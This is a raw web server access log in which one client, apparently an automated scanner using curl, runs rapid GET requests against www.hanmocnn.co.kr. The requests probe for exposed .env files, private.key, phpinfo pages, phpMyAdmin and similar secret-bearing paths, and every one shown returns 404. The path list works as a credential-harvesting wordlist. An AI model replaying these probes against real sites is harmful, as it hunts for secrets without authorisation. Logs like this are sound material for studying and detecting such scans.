GET https www.hanmocnn.co.kr "/nginx-server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/niffler-frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/node_modules/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Nodejs-Projects/play-ground/login/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Nodejs-Projects/play-ground/ManageUserRoles/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/noVNC/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/now.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Nuke.App.Ui/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/nuxt/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/o.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ocp.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/of.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/old/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/old/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/old_phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/old_site/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/oldsanta/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/opencart/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ops/vagrant/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/option/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/orientdb-client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/outputs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/owncloud/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/p.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/packages/styled-ui-docs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/packages/web/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/packed/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/page-editor/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/panel/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/parity/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Passportjs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/patchwork/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/path/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pfbe/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php.ini" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php1.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php52/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpcustom_info/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.html" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php4" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php5" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo1.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo2.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo3.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo4.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfodev.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfos.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpMyAdmin/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpmyadmin/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpsysinfo" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpsysinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpsysinfo/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpsysinfo/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpsysinfo/phpsysinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phptest.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpversion.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pi.php5" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pictures/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/platform/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/playground/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/plugin_static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/plugins/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/post-deployment/.vscode/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/postfixadmin/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/prestashop/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/preview-env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/preview/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/price_hawk_client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/prisma/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private.key" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/processor/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Procfile" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/prod/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/product/.env.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/projbackend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/project/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/project_root/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/protected/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/psnlink/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pt2/countries/src/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pt8/library-backend-gql/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pub/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/public/system" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/public_html/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/public_root/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/q.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/qq.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/question2/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/qv-frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rabbitmq-cluster/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rails-api/react-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rails/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rasax/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/react/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/react_todo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/redmine/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/repo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/repos/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/repository/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/docker/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/docker/mysql/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:13:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/docker/phpmyadmin/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/docker/rabbitmq/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resources/docker/rediscommander/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/resourcesync/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rest.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/restapi/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/results/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rollup.config.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/root/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rosterBack/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/roundcube/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/roundcubemail/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/routes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/run/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rust-backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/rust-backend/dao/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/s-with-me-front/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/s3.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/saas/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/samples/chatroom/chatroom-spa/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/samples/docker/deploymentscripts/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sapi/debug/default/view" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/script/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/scripts/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/scripts/fvt/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" 